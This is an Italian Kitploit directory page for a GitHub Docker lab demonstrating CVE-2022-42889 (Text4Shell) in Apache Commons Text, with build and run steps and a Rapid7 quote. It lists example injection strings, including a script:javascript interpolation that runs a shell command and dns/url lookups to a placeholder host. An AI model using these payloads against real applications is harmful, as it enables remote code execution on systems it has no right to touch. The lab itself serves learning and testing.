Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-42889 — docker per CVE-2022-42889 | Kitploit
Strumenti/GitHubGitHub/necroteddy/cve-2022-42889
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubnecroteddy/cve-2022-42889

CVE-2022-42889

docker per CVE-2022-42889

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-42889-POC

Una semplice applicazione demo che mostra come sfruttare la vulnerabilità CVE-2022-42889.
Utilizza servizi OOB (Out of Band) per dimostrare i prefissi dns e url.

JavaDocs per l'interpolazione di commons-text JavaDocs di commons-text

Interpolazioni di esempio

  • script:javascript ("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/blop')}")
  • dns ("${dns:address|HOST}")
  • url ("${url:UTF-8:http://HOST")

Citazione da Rapid7

La vulnerabilità è stata paragonata a Log4Shell poiché è una vulnerabilità a livello di libreria open-source che probabilmente avrà un impatto su un'ampia varietà di applicazioni software che utilizzano l'oggetto interessato.
Tuttavia, le analisi iniziali indicano che questo è un paragone inappropriato. La natura della vulnerabilità comporta che, a differenza di Log4Shell, sarà raro che un'applicazione utilizzi il componente vulnerabile di Commons Text per elaborare input non attendibili e potenzialmente dannosi.

Prerequisiti

  • docker
  • java
  • maven

Java e maven possono essere saltati se si recupera un'immagine da Docker Hub

Utilizzo

Compilare l'applicazione

root@kitploit:~
mvn clean package

Creare l'immagine docker

root@kitploit:~
docker build -t cve-2022-42889-poc .

Eseguire l'immagine docker

Scarica lo strumento
root@kitploit:~
docker run --rm -p 8081:8081 -t cve-2022-42889-poc

Accedere all'applicazione e seguire le istruzioni

root@kitploit:~
open http://localhost:8081

Ulteriori informazioni

  • NIST NVD
  • Rapid 7